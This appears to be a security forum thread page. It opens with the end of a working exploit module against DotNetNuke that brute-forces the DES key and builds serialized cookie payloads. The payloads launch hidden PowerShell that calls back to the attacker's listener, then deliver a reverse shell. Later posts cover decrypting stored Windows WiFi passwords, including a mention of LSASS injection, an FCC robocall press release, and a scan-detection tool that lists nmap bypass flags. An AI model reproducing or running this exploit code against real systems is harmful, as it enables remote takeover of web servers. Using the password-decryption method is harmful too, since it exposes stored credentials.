= @kpt[0, 8] c_iv = f8_plain.unpack("C*") + [8 - f8_plain.length] * (8 - f8_plain.length) @decryptor.iv = String.new(c_iv.pack("C*")) @decryptor.padding = 0 key = find_key(@verification_codes[0]) if key.blank? return end if @target_idx == 4 # target is v9.2.2+, requires base64 generated key and IV values. generate_base_keys(0, key.each_byte.to_a, "") vprint_status("Generated #{@possible_keys.size} possible base KEY values from #{key}") # re-enable padding here as it doesn't have the # same performance impact when trying to find possible IV values. @decryptor.padding = 1 print_warning("Finding possible base IVs. This may take a few minutes...") start = Time.now find_ivs(@verification_codes, key) elapsed = Time.now - start vprint_status( format( "Found %<n_ivs>d potential Base IV values using %<n_codes>d "\ "verification codes in %<e_time>.2f seconds.", n_ivs: @possible_ivs.size, n_codes: @verification_codes.size, e_time: elapsed.to_s ) ) generate_payload_passphrases vprint_status(format("Generated %<n_phrases>d possible base64 KEY and IV combinations.", n_phrases: @passphrases.size)) end if @passphrase.blank? # test all generated passphrases by # sending an exploit payload to the target # that will callback to an HTTP listener # with the index of the passphrase that worked. # set SRVHOST as LHOST value for HTTPServer mixin datastore['SRVHOST'] = datastore['LHOST'] print_warning("Trying all possible KEY and IV combinations...") print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...") start_service vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...") test_passphrases # If no working passphrase has been found, # wait to allow the the chance for the last one to callback. if @passphrase.empty? && !@dry_run sleep(wfs_delay) end if service stop_service end print "\r\n" if !@passphrase.empty? print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found") end end end send_exploit_payload end # ===================== # For the check command # ===================== def check if target.name == 'Automatic' select_target end @target_idx = Integer(datastore['TARGET']) if @target_idx == 0 fail_with(Failure::NoTarget, 'No valid target found or specified.') end # Check if 404 page is custom or not. # Vulnerability requires custom 404 handling (enabled by default). uri = normalize_uri(target_uri.path) print_status("Checking for custom error page at: #{uri} ...") res = send_request_cgi( 'uri' => uri ) if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600 print_good("Custom error page detected.") else print_error("IIS Error Page detected.") return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end # =========================== # Auto-select target version # =========================== def select_target print_status("Trying to determine DNN Version...") # Check for copyright version in /Documentation/license.txt uri = %r{^(.*[\\\/])}.match(target_uri.path)[0] vprint_status("Checking version at #{normalize_uri(uri + 'Documentation', 'License.txt')} ...") res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(uri + 'Documentation', 'License.txt') ) year = -1 if res && res.code == 200 # License page found, get latest copyright year. matches = @cr_regex.match(res.body) if matches year = matches[0].to_i end else vprint_status("Checking version at #{uri} ...") res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(uri) ) if res && res.code == 200 # Check if copyright info is in page HTML. matches = @cr_regex.match(res.body) if matches year = matches[0].to_i end end end if year >= 2018 print_warning( %q(DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2. Try setting target 4 and supply a file of of verification codes or specifiy valid Key and IV values.") ) datastore['TARGET'] = 3 elsif year == 2017 print_warning('DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED') datastore['TARGET'] = 2 elsif year < 2017 && year > 2008 print_good("DNN Version Found: v5.1.0 - v9.0.1") datastore['TARGET'] = 1 elsif year == 2008 print_warning("DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).") datastore['TARGET'] = 1 else print_warning("Could not determine DNN version. Target may still be vulnerable. Manually set the Target value") end end # ============================== # Known plaintext attack to # brute-force the encryption key # ============================== def find_key(cipher_text) print_status("Finding Key...") # Counter total_keys = @key_charset.length**8 i = 1 # Set start time start = Time.now # First char @key_charset.each_byte do |a| key = a.chr # 2 @key_charset.each_byte do |b| key[1] = b.chr # 3 @key_charset.each_byte do |c| key[2] = c.chr # 4 @key_charset.each_byte do |d| key[3] = d.chr # 5 @key_charset.each_byte do |e| key[4] = e.chr # 6 @key_charset.each_byte do |f| key[5] = f.chr # 7 @key_charset.each_byte do |g| key[6] = g.chr # 8 @key_charset.each_byte do |h| key[7] = h.chr if decrypt_data_and_iv(@decryptor, cipher_text, String.new(key)) elapsed = Time.now - start print_search_status(i, elapsed, total_keys) print_line if @target_idx == 4 print_good("Possible Base Key Value Found: " + key) else print_good("KEY Found: " + key) print_good("IV Found: " + @passphrase[8..-1]) end vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i)) vprint_status(format("Time to crack: %<c_time>.3f seconds", c_time: elapsed.to_s)) return String.new(key) end # Print timing info every 5 million attempts if i % 5000000 == 0 print_search_status(i, Time.now - start, total_keys) end i += 1 end end end end end end end end elapsed = Time.now - start print_search_status(i, elapsed, total_keys) print_line print_error("Key not found") vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i)) vprint_status(format("Time run: %<r_time>.3f seconds", r_time: elapsed.to_s)) return nil end # ================================== # Attempt to decrypt a ciphertext # and obtain the IV at the same time # ================================== def decrypt_data_and_iv(cipher, cipher_text, key) cipher.key = key begin plaintext = cipher.update(cipher_text) + cipher.final if @target_idx == 4 # Target is v9.2.2+ user_id = plaintext[8, @user_id_pt_length] if @user_id_regex.match(user_id) return true end return false end # This should only execute if the version is 9.1.1 - 9.2.1 iv = plaintext[0, 8] if !@iv_regex.match(iv) return false end # Build encryption passphrase as DNN does. @passphrase = key + iv # Encrypt the plaintext value using the discovered key and IV # and compare with the initial ciphertext if cipher_text == encrypt_data(@encryptor, @kpt, @passphrase) @passphrases.push(String.new(key + iv)) return true end rescue StandardError # Ignore decryption errors to allow execution to continue return false end return false end def print_search_status(num_tries, elapsed, max_tries) msg = format("Searching at %<s_rate>.3f keys/s ...... %<p_complete>.2f%% of keyspace complete.", s_rate: num_tries / elapsed, p_complete: (num_tries / max_tries.to_f) * 100) print("\r%bld%blu[*]%clr #{msg}") end # =========================== # Encrypt data using the same # pattern that DNN uses. # =========================== def encrypt_data(cipher, message, passphrase) cipher.key = passphrase[0, 8] cipher.iv = passphrase[8, 8] return cipher.update(message) + cipher.final end # =============================================== # Generate all possible base key values # used to create the final passphrase in v9.2.2+. # DES weakness allows multiple bytes to be # interpreted as the same value. # =============================================== def generate_base_keys(pos, from_key, new_key) if !@unchanged.include? from_key[pos] if from_key[pos] % 2 == 0 new_key[pos] = (from_key[pos] + 1).chr else new_key[pos] = (from_key[pos] - 1).chr end if new_key.length == 8 @possible_keys.add(String.new(new_key)) # also add key with original value new_key[pos] = (from_key[pos]).chr @possible_keys.add(String.new(new_key)) else generate_base_keys(pos + 1, from_key, String.new(new_key)) # also generate keys with original value new_key[pos] = (from_key[pos]).chr generate_base_keys(pos + 1, from_key, String.new(new_key)) end else new_key[pos] = (from_key[pos]).chr if new_key.length == 8 @possible_keys.add(String.new(new_key)) else generate_base_keys(pos + 1, from_key, String.new(new_key)) end end end # ============================================== # Find all possible base IV values # used to create the final Encryption passphrase # ============================================== def find_ivs(cipher_texts, key) num_chars = 8 - @kpt.length f8regex = /#{@kpt}[0-9a-f]{#{num_chars}}/ @decryptor.key = key found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final # Find all possible IVs for the first ciphertext brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1]) # Reduce IV set by testing against other ciphertexts cipher_texts.drop(1).each do |cipher_text| @possible_ivs.each do |iv| @decryptor.iv = iv pt = @decryptor.update(cipher_text) + @decryptor.final if !f8regex.match(pt[0, 8]) @possible_ivs.delete(iv) end end end end # ========================================== # A recursive function to find all # possible valid IV values using brute-force # ========================================== def brute_force_ivs(pt_prefix, num_chars_needed, cipher_text, key, found_pt) charset = "0123456789abcdef" if num_chars_needed == 0 @decryptor.key = key @decryptor.iv = pt_prefix pt = @decryptor.update(cipher_text) + @decryptor.final iv = pt[0, 8] if @iv_regex.match(iv) pt = pt_prefix + found_pt if encrypt_data(@encryptor, pt, key + iv) == cipher_text @possible_ivs.add(String.new(iv)) end end return end charset.length.times do |i| brute_force_ivs(String.new(pt_prefix + charset[i]), num_chars_needed - 1, cipher_text, key, found_pt) end end # ======================================== # Generate all possible payload encryption # passphrases for a v9.2.2+ target # ======================================== def generate_payload_passphrases phrases = Set.new(@passphrases) @possible_keys.each do |key| @possible_ivs.each do |iv| phrase = Rex::Text.encode_base64( encrypt_data(@encryptor, key + iv, key + iv) ) phrases.add(String.new(phrase[0, 16])) end end @passphrases = phrases.to_a end # =========================================== # Test all generated passphrases by initializing # an HTTP server to listen for a callback that # contains the index of the successful passphrase. # =========================================== def test_passphrases for i in 0..@passphrases.size - 1 # Stop sending if we've found the passphrase if !@passphrase.empty? break end msg = format("Trying KEY and IV combination %<current>d of %<total>d...", current: i + 1, total: @passphrases.size) print("\r%bld%blu[*]%clr #{msg}") url = "#{get_uri}?#{get_resource.delete('/')}=#{i}" payload = create_request_payload(url) cookie = create_cookie(payload) # Encrypt cookie value enc_cookie = Rex::Text.encode_base64( encrypt_data(@encryptor, cookie, @passphrases[i]) ) if @dry_run print_line print_warning("DryRun enabled. No exploit payloads have been sent to the target.") print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...") print_line(enc_cookie) break end execute_command(enc_cookie, host: datastore['RHOST']) end end # =============================== # Request handler for HTTP server. # ============================== def on_request_uri(cli, request) # Send 404 to prevent scanner detection send_not_found(cli) # Get found index - should be the only query string parameter if request.qstring.size == 1 && request.qstring[get_resource.delete('/').to_s] index = request.qstring[get_resource.delete('/').to_s].to_i @passphrase = String.new(@passphrases[index]) end end # ============================================== # Create payload to callback to the HTTP server. # Note: This technically exploits the # vulnerability, but provides a way to determine # the valid passphrase needed to exploit again. # ============================================== def create_request_payload(url) psh_cmd = "/b /c start /b /min powershell.exe -nop -w hidden -noni -Command \"Invoke-WebRequest '#{url}'\"" psh_cmd_bytes = psh_cmd.bytes.to_a cmd_size_bytes = write_encoded_int(psh_cmd.length) # Package payload into serialized object payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end object_size = write_encoded_int(payload_object.length) # Create the final seralized ObjectStateFormatter payload final_payload = @osf_header + object_size + payload_object b64_payload = Rex::Text.encode_base64(final_payload.pack("C*")) return b64_payload end # ============================================= # Reproduce the WriteEncoded method in # the native .NET ObjectStateFormatter.cs file. # ============================================= def write_encoded_int(value) enc = [] while (value >= 0x80) v = value | 0x80 enc.push([v].pack("V")[0].unpack1("C*")) value >>= 7 end enc.push([value].pack("V")[0].unpack1("C*")) return enc end # ================================= # Creates the payload cookie # using the specified payload # ================================= def create_cookie(payload) cookie = "<profile>"\ "<item key=\"k\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, "\ "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"\ "[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "\ "Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "\ "Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">"\ "<ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\ "<ProjectedProperty0>"\ "<MethodName>Deserialize</MethodName>"\ "<MethodParameters>"\ "<anyType xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\ "xmlns:d=\"http://www.w3.org/2001/XMLSchema\" i:type=\"d:string\" "\ ">#{payload}</anyType>"\ "</MethodParameters>"\ "<ObjectInstance xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\ "i:type=\"ObjectStateFormatter\" />"\ "</ProjectedProperty0>"\ "</ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\ "</item>"\ "</profile>" return cookie end # ========================================= # Send the payload to the target server. # ========================================= def execute_command(cookie_payload, opts = { dnn_host: host, dnn_port: port }) uri = normalize_uri(target_uri.path) res = send_request_cgi( 'uri' => uri, 'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};" ) if !res fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.") elsif res.code == 404 return true elsif res.code == 400 fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}") else fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}") end end # ====================================== # Create and send final exploit payload # to obtain a reverse shell. # ====================================== def send_exploit_payload cmd_payload = create_payload cookie_payload = create_cookie(cmd_payload) if @encrypted if @passphrase.blank? print_error("Target requires encrypted payload, but a passphrase was not found or specified.") return end cookie_payload = Rex::Text.encode_base64( encrypt_data(@encryptor, cookie_payload, @passphrase) ) end if @dry_run print_warning("DryRun enabled. No exploit payloads have been sent to the target.") print_warning("Printing exploit cookie payload...") print_line(cookie_payload) return end # Set up the payload handlers payload_instance.setup_handler # Start the payload handler payload_instance.start_handler print_status("Sending Exploit Payload to: #{normalize_uri(target_uri.path)} ...") execute_command(cookie_payload, host: datastore['RHOST']) end # =================================== # Create final exploit paylod based on # supplied payload options. # =================================== def create_payload # Create payload psh_cmd = "/b /c start /b /min " + cmd_psh_payload( payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: false ) psh_cmd_bytes = psh_cmd.bytes.to_a cmd_size_bytes = write_encoded_int(psh_cmd.length) # Package payload into serialized object payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end object_size = write_encoded_int(payload_object.length) # Create the final seralized ObjectStateFormatter payload final_payload = @osf_header + object_size + payload_object b64_payload = Rex::Text.encode_base64(final_payload.pack("C*")) vprint_status("Payload Object Created.") return b64_payload end end Source
      • 2
      • Upvote
  7. Kev

    Useful stuff

  8. Introduction This research article throws light on the internal password storage and encryption mechanism used for storing the WiFi account passwords. It explains where the WiFi passwords are stored on different platforms and how to decrypt them using the practical code sample. Note that it deals with WiFi settings stored by built-in Windows Wireless Configuration manager only. Also it covers only Vista and higher operating systems, though it may touch upon some aspects of Windows XP. WiFi Configuration All Windows systems has built-in 'Wireless Configuration Manager' which helps in managing your Wireless connections Here are the simple steps involved in configuring your WiFi setup, From Control Panel, click on 'Network & Internet' Next click on 'Network & Sharing Center'. You will see all your network connections Now from the left panel click on 'Manage Wireless Networks' This will launch 'Wireless Configration' screen showing all your configured WiFi connections You can click on 'ADD' and then click on 'Manually Create Network Profile' to create new WiFi connections. Below is the screenshot showing the 'Add Wireless Network' dialog WiFi Password Location Before we proceed, we need to know where these wireless settings are stored on the system. Depending on the platform, 'Wireless Configuration Manager' uses different techniques and different storage locations to store these wireless settings. For Windows XP/2003 On XP, all the Wireless settings are stored in Registry at following location,. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} Here each wireless device/interface is represented by unique GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} and all the settings for this device are stored under this GUID within the value 'ActiveSettings'. Actual contents are encrypted using 'Windows Cryptography' functions [Reference 1]. For Vista, Windows 7, Windows 8 & Windows 10 Vista onwards, 'Wireless Configuration Manager' no longer uses the registry. Instead all the wireless parameters including SSID, Authentication method & encrypted Password are stored at following file, C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml Here each wireless device is represented by its interface GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} and all the wireless settings for this device are stored in XML file with random GUID name. WiFi Storage Mechanism All the information discussed hence forth will apply only to Vista and higher operating systems only. As we know already, each wireless settings are stored in XML file. Here is the actual contents of one such file, <?xml version="1.0"?> <WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"> <name>SecurityXploded</name> <SSIDConfig> <SSID> <hex>536563757269747958706C6F646564</hex> <name>SecurityXploded</name> </SSID> <nonBroadcast>false</nonBroadcast> </SSIDConfig> <connectionType>ESS</connectionType> <connectionMode>auto</connectionMode> <autoSwitch>false</autoSwitch> <MSM> <security> <authEncryption> <authentication>WPAPSK</authentication> <encryption>AES</encryption> <useOneX>false</useOneX> </authEncryption> <sharedKey> <keyType>passPhrase</keyType> <protected>true</protected> <keyMaterial>01000000D08C9DDF0115D1118C7A00C0***TRUNCATED***DA88A2</keyMaterial> </sharedKey> </security> </MSM> </WLANProfile> Each Wireless profile mainly stores information about WiFi name, security settings such as authentication, encryption and the encrypted password. In the above example, WiFi Network name aka SSID is 'SecurityXploded' which is stored in both ASCII and HEX format. Next important things are authentication & encryption which are stored within <authEncryption> node. This wireless configuration uses WPA (WPAPSK) for authentication and AES for encryption. Now comes the most interesting thing, 'WiFi Password' which is stored under under <sharedKey> node. Here <protected> field indicates if the password is encrypted or stored in clear text. If the <protected> field is true that means password is encrypted and same can be found in <keyMaterial> node as in above example. WiFi Password Encryption & Decryption If you are one of us who live in Crypto world then it does not take much time to decipher the encryption method used here. Clearly it uses 'Windows Cryptography' functions [Reference 1] to encrypt & decrypt the WiFi passwords. Here is the signature which is at the beginning of encrypted password. 01000000D08C9DDF0115D1118C7A00C0 To be more precise, 'Wireless Configuration Manager' uses CryptProtectData to encrypt the Wireless keys & passwords. Another notable thing is that it does not use any salt or magic key for encryption. This makes decryption simple and straightforward using CryptUnprotectData as shown in the example below. // // Wireless Key/Password Decryption Algorithm for Vista/Windows 7/Windows 8/Windows 10 // void DecryptWiFiPassword(BYTE *buffer, DWORD dwSizeBuffer) { DATA_BLOB DataIn; DATA_BLOB DataOut; DataIn.pbData = buffer; DataIn.cbData = dwSizeBuffer; if(CryptUnprotectData(&DataIn, 0, NULL, NULL,NULL,0,&DataOut)) { printf("\n Wireless Key Password : %s", (char *) DataOut.pbData); } } One catch here is that you can't just decrypt the password even though you are administrator. To successfully decrypt the password, you have to perform the decryption operation under system context. There are many ways to execute the code under SYSTEM context, one of the popular way is to inject the code via remote thread [Reference 2] in system process - LSASS.EXE. But this one is more risky, as any flaw in code can bring down the entire system. Much safer way is to create Windows service as System account and then execute the above decryption code from that service. Recover Wireless Passwords using WiFi Password Decryptor WiFi Password Decryptor is the FREE tool to automatically detects & decrypts Wireless passwords stored on your system. It instantly recovers all the WiFi passwords and displays various security settings (WEP/WPA/AES/TKIP etc) along with password in clear text. It works on both 32 bit & 64 bit platforms, starting from Vista to latest operating system, Windows 10. References Windows Cryptography Functions Remote Thread Execution in System Process using NtCreateThreadEx for Vista/Win7 Source
      • 1
      • Upvote
  9. Industry-wide Deployment of STIR/SHAKEN Will Yield Substantial Benefits for American Consumers WASHINGTON, March 31, 2020—The Federal Communications Commission today adopted new rules requiring implementation of caller ID authentication using technical standards known as “STIR/SHAKEN.” These rules will further the FCC’s efforts to protect consumers against malicious caller ID “spoofing,” which is often used during robocall scam campaigns to trick consumers into answering their phones. STIR/SHAKEN enables phone companies to verify that the caller ID information transmitted with a call matches the caller’s phone number. Widespread deployment of STIR/SHAKEN will reduce the effectiveness of illegal spoofing, allow law enforcement to identify bad actors more easily, and help phone companies identify calls with illegally spoofed caller ID information before those calls reach their subscribers. Today’s Order requires all originating and terminating voice service providers to implement STIR/SHAKEN in the Internet Protocol (IP) portions of their networks by June 30, 2021, a deadline that is consistent with Congress’s direction in the recently-enacted TRACED Act. The FCC laid the groundwork for these new rules when it formally proposed and sought public comment on mandating STIR/SHAKEN implementation in June 2019. The FCC today also adopted a Further Notice of Proposed Rulemaking to take public comment on expanding the STIR/SHAKEN implementation mandate to cover intermediate voice service providers; extending the implementation deadline by one year for small voice service providers pursuant to the TRACED Act; adopting requirements to promote caller ID authentication on voice networks that do not rely on IP technology; and implementing other aspects of the TRACED Act. The FCC estimates that the benefits of eliminating the wasted time and nuisance caused by illegal scam robocalls will exceed $3 billion annually, and STIR/SHAKEN is an important part of realizing those cost savings. Additionally, when paired with call analytics, STIR/SHAKEN will help protect American consumers from fraudulent robocall schemes that cost Americans approximately $10 billion annually. Improved caller ID authentication will also benefit public safety by reducing spoofed robocalls that disrupt healthcare and emergency communications systems. Further, implementation of STIR/SHAKEN will restore consumer trust in caller ID information and encourage consumers to answer the phone, to the benefit of consumers, businesses, healthcare providers, and non-profit organizations. Over the past three years, the FCC has aggressively pursued a multi-part strategy for combatting spoofed robocalls—issuing hundreds of millions of dollars in fines for violations of its Truth in Caller ID rules; expanding those rules to reach foreign calls and text messages; enabling voice service providers to block certain clearly unlawful calls before they reach consumers’ phones; and clarifying that voice service providers may offer call-blocking services by default. The FCC has also called on the industry to “trace back” illegal spoofed calls and text messages to their original sources. More information on caller ID authentication, including STIR/SHAKEN, is available at: https://www.fcc.gov/call-authentication. Consumers can also find tips for protecting themselves against malicious spoofing at: https://www.fcc.gov/spoofing. Action by the Commission March 31, 2020 by Report and Order and Further Notice of Proposed Rulemaking (FCC 20-42). Chairman Pai, Commissioners O’Rielly, Carr, Rosenworcel, and Starks approving and issuing separate statements. WC Docket Nos. 17-97, 20-67 Source
  10. Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. Recon-Informer.py import logging,os,ctypes,sys,argparse,time,re from subprocess import * from datetime import datetime from pkgutil import iter_modules import pkg_resources #Recon-Informer (c) #By John Page (Hyp3rlinx) #ApparitionSec #hyp3rlinx.altervista.org #twitter.com/hyp3rlinx #apparitionsec@gmail.com #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc #========================================================== # #Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. # #Purpose: #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever. #Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel. #Therefore, this script is most useful for basic short-term defensive visibility. # #Features: #Attempt to detect and identify typical port scans generated using Nmap including scan type. #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy). # #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result. #XMAS scans work against systems following RFC 793 for TCP/IP and don’t work against any Windows versions, #NULL is another type that don't work well on Windows. # #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS #its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied. #With -s flag you can add extra scan types to detect that otherwise would be ignored. # #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default. #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you #will see this detection preceding most scans. Also, you may see (noise) non-reconaissance related ARP #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag. # #ICMP #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping. # #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS. #Firewall rule for blocks are in-bound "ANY" but still allows out-bound. #FW rules are named like ReconInformer_<HOST-IP>. # #DELETE FW RULE -d <IP-ADDR> to remove FW rules for blocked hosts. # #WHITELIST -w HOST-IP(s) you never want to block on. # #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc. #ignore packets destined for specific ports to try reduce false positive probe alerts. # #IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS #from SMB connected shares to try reduce false positives. # #LOG -l flag, default size limit for writing to disk is 1MB. # #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc. #To detect UDP scans use the -u flag, then can also combine with -f port filter #(reduce noise) on specific dest ports like 137,161,1900,2869,7680. # #PCAP saving -s flag, default size limit is also 1MB. # #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect. # #Private Network range: #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored. # #BYPASS examples --scanflags and custom packet window sizes: #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets. # #These scans can bypass Recon-Informer and correctly report open ports found. #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139 #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x # #Therefore, I accounted for some of these in Recon-Informer to report these detections. # #SCANFLAGS #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct) #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct) #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned) #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful) #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful) # #The above scanflag examples, would have bypassed detection if we didn't check packets for them. #Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks: # #10=(0x00a) SYNPSH #34= (0x22) SYNURG #42=(0x02a) SYNPSHURG #66 (0x42) SYNECN #74 (0x04a) SYNPSHECN #98 (0x062) SYNURGECN #106 (0x06a) SYNPSHURGECN #130 (0x082) SYNCWR #138 (0x08a) SYNPSHCWR #162 (0x0a2) SYNURGCWR #170 (0x0aa) SYNPSHURGCWR #194 (0x0c2) SYNECNCWR #202 (0x0ca) SYNPSHECNCWR #226 (0x0e2) SYNURGECNCWR #234 (0x0ea) SYNPSHURGECNCWR # #Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!. #ip=IP(dst="192.168.1.104") #syn=TCP(sport=54030,dport=139,window=666,flags="S") #send(ip/syn) # #Custom packet tests were tested on Kali to Win7/10 machines. #Recon-Informer trys to inform about most typical out-of-the-box type of scans. # #Service scans -A detection: #nmap -n -Pn -T4 -A x.x.x.x -p22 #If we scan from Kali Linux to Windows machine port 23 using -A we see SYN followed by XMAS #also we see an immediate high port of like 30000 or more. # #But scanning Windows ports 135 - 139 we see FSPU flags set so we can be fairly confident #it is a Service scan -A also it usually is followed by scanning high ports of 30000 or greater. # #However, I found that an easier way to pick up service -A scans is checking the window size. #If the window size is 65535 we can be fairly certain its a service -A scan. #Sometimes -A scan seems only to be detected when certain ports are hit. # #Example, Windows ports 135,139 or Kali Linux ports 1, 22 etc... #If not targeting port 135/139 (windows) -A detect may get missed. #Testing on newest nmap on Kali seemed to be easier to detect -A scan on ports other than 135/139. #Anyway, added this to try get more intel about possible incoming probes. # #DECOY SCAN -D detection set to a threshold of two or more ip-addresses. # #Examples: #capture TCP packets only, restores console on detection, detect ping sweep and ICMP #Recon-Informer.py -i <ATTACKER-BOX> -r -p # #capture UDP, whitelist ips, block, log, restore console, save pcap, detect XMAS,NULL on Win OS box. #Recon-Informer.py -i <ATTACKER-BOX> -u -w -b -l -r -a -s X,N # #capture UDP, filter ports, whitelist ips, block and deletes a previous FW rule #Recon-Informer.py -i <ATTACKER-BOX> -u -f 137,161 -w -b -d <HOST-IP> # #ignore specific hosts for whatever reason you may have #Recon-Informer.py -i <ATTACKER-BOX> -n host1, host2 # #capture TCP packets block all offending hosts (in-bound only) on detection, filter port 7680 MS WUDO #Recon-Informer.py -i <ATTACKER-BOX> -b -f 7680 # #Dependencies: #npcap or winpcap, scapy, clint and pygetwindow. # #Tested Win7/10/Linux/Kali - Wired Ethernet LAN and Wifi networks. # #Scapy Errors: #If get scapy runtime error "NameError: global name 'log_runtime' is not defined on scapy" #OR you get "ImportError: cannot import name NPCAP_PATH" #Download the latest https://github.com/secdev/scapy #They were bugs in scapy thats been fixed in 2.4.3. # #======================================================================================== #Packet window size tests: # #CONNECT -sT scan window size anomalies and example of port detection bypass. #Whats nice about detecting CONNECT scans is if someone does a telnet x.x.x.x <port> it #should also get flagged by Recon-Informer. FYI, if SYN scan is run as non-root user #it becomes CONNECT scan. # #1) Custom scapy CONNECT scan from Kali to Win7/Win10 box with SYN flag set window size is 8192 #2) Nmap -sT CONNECT Win10 to Win7 used window size of 64240 #3) Nmap -sT CONNECT i686 i386 GNU/Linux box with Nmap v4.11 to Win7/Win10 had window size 5840 #4) Nmap -sT CONNECT Kali to Win7/Win10 used window size of 29200 #5) Nmap -sT CONNECT Win7 to Win10 also window size was 8192 as in case 1) # #Nmap versions 4.11, 7.70 and 7.80 were used for port scan testing: #However, we may not be able to catch them all, like when custom window size is used. # #False positives: #Some ports (MS UPNP Host port 2869) as they show up as CONNECT or MAIMON #scans on some noisy networks. HTTP GET requests can also be flagged as CONNECT scans. #TCP source port 443 can also get picked up from web browsers or webapps. #======================================================================================= # #VM and NAT setups: # #TEST -sZ COOKIE_ECHO: #1) Kali to Win (NAT) we see 3-way handshake and no SCTP packets #2) Win to Win 10. range we see the SCTP packets # #TEST -sT CONNECT #1) Win to Win 10.x.x.x range we see correct packets in wireshark #SYN packet with a large amount of TCP options # #If use NAT mode on VM the machine may perform 3-way handshake #Recon-Informer may report SYN scans as CONNECT scans as they become ambigous. # # #DISCLAIMER: #Author is NOT responsible for any damages whatsoever by using this software, #by using Recon Informer you assume and accept all risk implied or otherwise. #======================================================================================= BANNER=""" ____ ____ ____ / __ \___ _________ ____ / _/___ / __/___ _________ ___ ___ _____ / /_/ / _ \/ ___/ __ \/ __ \ / // __ \/ /_/ __ \/ ___/ __ `__ \/ _ \/ ___/ / _, _/ __/ /__/ /_/ / / / / _/ // / / / __/ /_/ / / / / / / / / __/ / /_/ |_|\___/\___/\____/_/ /_/ /___/_/ /_/_/ \____/_/ /_/ /_/ /_/\___/_/ v1 Intel for offensive systems --------------------------- By Hyp3rlinx ApparitionSec """ local_ip_address="" OS="win32" whitelist_conf="Recon-Whitelist.txt" ip_whitelist=set() 